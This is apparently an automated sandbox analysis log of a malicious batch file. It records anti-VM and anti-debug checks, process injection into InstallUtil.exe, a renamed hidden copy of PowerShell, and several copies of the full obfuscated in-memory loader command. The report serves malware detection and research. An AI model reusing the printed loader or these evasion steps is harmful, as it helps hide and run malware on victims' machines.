Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94217
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 93999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 93890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 93781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95351
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799419
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1799015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798746
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 1798531
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004978000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: MustFlush.bat.Dmf, 00000010.00000002.1598733729.0000000008DD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwareVBox
Source: InstallUtil.exe, 00000008.00000002.1507157762.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000012.00000002.3819842378.0000000005D3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 18_2_014170B0 CheckRemoteDebuggerPresent, 18_2_014170B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process token adjusted: Debug
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process token adjusted: Debug
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A0000
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7A2000
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7DE000
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7E0000
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 5DB008
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf c:\users\user\desktop\ilzhnx3jac.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\desktop\ilzhnx3jac.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf c:\users\user\appdata\roaming\mustflush.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\appdata\roaming\mustflush.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf c:\users\user\desktop\ilzhnx3jac.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\desktop\ilzhnx3jac.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf c:\users\user\appdata\roaming\mustflush.bat.dmf -windowstyle hidden -command "$ddjudzf = get-content 'c:\users\user\appdata\roaming\mustflush.bat' | select-object -last 1; $qttfylkd = [system.convert]::frombase64string($ddjudzf);$cohunv = new-object system.io.memorystream( , $qttfylkd );$wepcwpnqbxa = new-object system.io.memorystream;$xtcusn = new-object system.io.compression.gzipstream $cohunv, ([io.compression.compressionmode]::decompress);$xtcusn.copyto( $wepcwpnqbxa );$xtcusn.close();$cohunv.close();[byte[]] $qttfylkd = $wepcwpnqbxa.toarray();[array]::reverse($qttfylkd); $arcfhlmphge = [system.appdomain]::currentdomain.load($qttfylkd); $cqife = $arcfhlmphge.entrypoint; $cqife.declaringtype.invokemember($cqife.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.InstallUtil.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.ilZhNx3JAc.bat.Dmf.8f4e360.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.MustFlush.bat.Dmf.6613670.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1517390065.0000000002711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.3806878045.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1407359736.0000000008F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
